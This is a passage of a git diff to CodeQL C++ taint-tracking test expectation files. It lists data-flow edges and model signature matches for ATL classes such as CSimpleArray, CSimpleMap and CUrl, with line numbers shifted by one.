atl.cpp:734:11:734:21 | call to source | atl.cpp:737:11:737:11 | x | | +| atl.cpp:734:11:734:21 | call to source | atl.cpp:749:11:749:11 | x | | +| atl.cpp:734:11:734:21 | call to source | atl.cpp:753:23:753:23 | x | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:737:5:737:5 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:738:10:738:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:739:5:739:5 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:740:10:740:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:744:10:744:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:746:3:746:3 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:738:10:738:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:739:5:739:5 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:739:5:739:5 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:740:10:740:10 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:740:10:740:10 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:743:10:743:11 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:744:5:744:6 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:744:5:744:6 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:744:5:744:6 | ref arg a2 | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:744:5:744:6 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:744:10:744:10 | a | atl.cpp:744:5:744:6 | ref arg a2 | TAINT | +| atl.cpp:744:10:744:10 | a | atl.cpp:744:8:744:8 | call to operator= | TAINT | +| atl.cpp:745:10:745:11 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:749:5:749:5 | a | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:750:10:750:10 | a | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:755:3:755:3 | a | | +| atl.cpp:749:5:749:5 | ref arg a | atl.cpp:750:10:750:10 | a | | +| atl.cpp:749:5:749:5 | ref arg a | atl.cpp:755:3:755:3 | a | | +| atl.cpp:750:10:750:10 | ref arg a | atl.cpp:755:3:755:3 | a | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | atl.cpp:753:15:753:16 | a2 | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | atl.cpp:754:10:754:11 | a2 | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | atl.cpp:755:3:755:3 | a2 | | +| atl.cpp:753:18:753:21 | call to Find | atl.cpp:754:13:754:15 | pos | | +| atl.cpp:754:10:754:11 | ref arg a2 | atl.cpp:755:3:755:3 | a2 | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:782:20:782:20 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:792:26:792:26 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:797:32:797:32 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:803:22:803:22 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:808:30:808:30 | x | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:782:5:782:5 | a | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:783:10:783:10 | a | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:784:3:784:3 | a | | +| atl.cpp:782:5:782:5 | ref arg a | atl.cpp:783:10:783:10 | a | | +| atl.cpp:782:5:782:5 | ref arg a | atl.cpp:784:3:784:3 | a | | +| atl.cpp:783:10:783:10 | ref arg a | atl.cpp:784:3:784:3 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:787:16:787:16 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:788:10:788:10 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:789:3:789:3 | a | | +| atl.cpp:787:18:787:24 | call to FindKey | atl.cpp:788:23:788:25 | pos | | +| atl.cpp:788:10:788:10 | ref arg a | atl.cpp:789:3:789:3 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:792:16:792:16 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:793:10:793:10 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:794:3:794:3 | a | | +| atl.cpp:792:18:792:24 | call to FindVal | atl.cpp:793:23:793:25 | pos | | +| atl.cpp:793:10:793:10 | ref arg a | atl.cpp:794:3:794:3 | a | | +| atl.cpp:796:33:796:33 | call to CSimpleMap | atl.cpp:797:16:797:16 | a | | +| atl.cpp:796:33:796:33 | call to CSimpleMap | atl.cpp:799:10:799:10 | a | | +| atl.cpp:796:33:796:33 | call to CSimpleMap | atl.cpp:800:3:800:3 | a | | +| atl.cpp:797:16:797:16 | ref arg a | atl.cpp:799:10:799:10 | a | | +| atl.cpp:797:16:797:16 | ref arg a | atl.cpp:800:3:800:3 | a | | +| atl.cpp:797:18:797:30 | call to ReverseLookup | atl.cpp:798:10:798:12 | key | | +| atl.cpp:797:18:797:30 | call to ReverseLookup | atl.cpp:799:19:799:21 | key | | +| atl.cpp:798:10:798:12 | ref arg key | atl.cpp:799:19:799:21 | key | | +| atl.cpp:799:10:799:10 | ref arg a | atl.cpp:800:3:800:3 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:803:5:803:5 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:804:10:804:10 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:805:3:805:3 | a | | +| atl.cpp:803:5:803:5 | ref arg a | atl.cpp:804:10:804:10 | a | | +| atl.cpp:803:5:803:5 | ref arg a | atl.cpp:805:3:805:3 | a | | +| atl.cpp:804:10:804:10 | ref arg a | atl.cpp:805:3:805:3 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:808:5:808:5 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:809:10:809:10 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:810:3:810:3 | a | | +| atl.cpp:808:5:808:5 | ref arg a | atl.cpp:809:10:809:10 | a | | +| atl.cpp:808:5:808:5 | ref arg a | atl.cpp:810:3:810:3 | a | | +| atl.cpp:809:10:809:10 | ref arg a | atl.cpp:810:3:810:3 | a | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:853:16:853:16 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:866:19:866:19 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:872:23:872:23 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:877:22:877:22 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:882:22:882:22 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:887:24:887:24 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:892:21:892:21 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:897:22:897:22 | x | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:853:3:853:5 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:860:8:860:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:900:1:900:1 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:854:8:854:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:855:8:855:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:856:8:856:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:857:8:857:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:858:8:858:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:859:8:859:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:860:8:860:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:900:1:900:1 | url | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:867:5:867:8 | url2 | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:869:3:869:3 | url2 | | +| atl.cpp:864:11:864:13 | len | atl.cpp:867:29:867:31 | len | | +| atl.cpp:865:10:865:15 | buffer | atl.cpp:867:20:867:25 | buffer | | +| atl.cpp:865:10:865:15 | buffer | atl.cpp:868:10:868:15 | buffer | | +| atl.cpp:866:5:866:8 | ref arg url2 | atl.cpp:867:5:867:8 | url2 | | +| atl.cpp:866:5:866:8 | ref arg url2 | atl.cpp:869:3:869:3 | url2 | | +| atl.cpp:867:20:867:25 | ref arg buffer | atl.cpp:868:10:868:15 | buffer | | +| atl.cpp:867:28:867:31 | ref arg & ... | atl.cpp:867:29:867:31 | len [inner post update] | | +| atl.cpp:867:29:867:31 | len | atl.cpp:867:28:867:31 | & ... | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:872:5:872:8 | url2 | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:873:10:873:13 | url2 | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:874:3:874:3 | url2 | | +| atl.cpp:872:5:872:8 | ref arg url2 | atl.cpp:873:10:873:13 | url2 | | +| atl.cpp:872:5:872:8 | ref arg url2 | atl.cpp:874:3:874:3 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:877:5:877:8 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:878:10:878:13 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:879:3:879:3 | url2 | | +| atl.cpp:877:5:877:8 | ref arg url2 | atl.cpp:878:10:878:13 | url2 | | +| atl.cpp:877:5:877:8 | ref arg url2 | atl.cpp:879:3:879:3 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:882:5:882:8 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:883:10:883:13 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:884:3:884:3 | url2 | | +| atl.cpp:882:5:882:8 | ref arg url2 | atl.cpp:883:10:883:13 | url2 | | +| atl.cpp:882:5:882:8 | ref arg url2 | atl.cpp:884:3:884:3 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:887:5:887:8 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:888:10:888:13 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:889:3:889:3 | url2 | | +| atl.cpp:887:5:887:8 | ref arg url2 | atl.cpp:888:10:888:13 | url2 | | +| atl.cpp:887:5:887:8 | ref arg url2 | atl.cpp:889:3:889:3 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:892:5:892:8 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:893:10:893:13 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:894:3:894:3 | url2 | | +| atl.cpp:892:5:892:8 | ref arg url2 | atl.cpp:893:10:893:13 | url2 | | +| atl.cpp:892:5:892:8 | ref arg url2 | atl.cpp:894:3:894:3 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | atl.cpp:897:5:897:8 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | atl.cpp:898:10:898:13 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | atl.cpp:899:3:899:3 | url2 | | +| atl.cpp:897:5:897:8 | ref arg url2 | atl.cpp:898:10:898:13 | url2 | | +| atl.cpp:897:5:897:8 | ref arg url2 | atl.cpp:899:3:899:3 | url2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 0d121219209..7e8a52fdb35 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -1,78 +1,78 @@ signatureMatches -| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:69:3:69:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:256:3:256:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:256:3:256:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:418:11:418:16 | Append | (wchar_t) | CComBSTR | Append | 0 | -| atl.cpp:419:11:419:16 | Append | (char) | CComBSTR | Append | 0 | -| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:424:11:424:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | -| atl.cpp:437:8:437:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | -| atl.cpp:438:8:438:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:438:8:438:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | -| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | -| atl.cpp:762:8:762:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:762:8:762:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:762:8:762:10 | Add | (const list &,const Allocator &) | list | list | 1 | -| atl.cpp:762:8:762:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:762:8:762:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:762:8:762:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:762:8:762:10 | Add | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:762:8:762:10 | Add | (vector &&,const Allocator &) | vector | vector | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:773:8:773:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:773:8:773:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:773:8:773:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | -| atl.cpp:774:8:774:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | -| atl.cpp:839:15:839:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:840:15:840:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:841:15:841:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:844:15:844:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:845:15:845:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:846:15:846:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:69:3:69:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:70:3:70:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:257:3:257:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:413:3:413:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:414:3:414:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:419:11:419:16 | Append | (wchar_t) | CComBSTR | Append | 0 | +| atl.cpp:420:11:420:16 | Append | (char) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:421:11:421:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:422:11:422:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:423:11:423:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | +| atl.cpp:423:11:423:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:425:11:425:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | +| atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | +| atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:448:13:448:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:538:3:538:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:542:11:542:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:544:11:544:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | +| atl.cpp:544:11:544:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | +| atl.cpp:763:8:763:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:763:8:763:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:763:8:763:10 | Add | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:763:8:763:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:763:8:763:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:763:8:763:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:763:8:763:10 | Add | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:763:8:763:10 | Add | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:774:8:774:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:774:8:774:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:774:8:774:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | +| atl.cpp:775:8:775:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | +| atl.cpp:840:15:840:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:841:15:841:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:842:15:842:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:845:15:845:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:846:15:846:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:847:15:847:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | | constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | 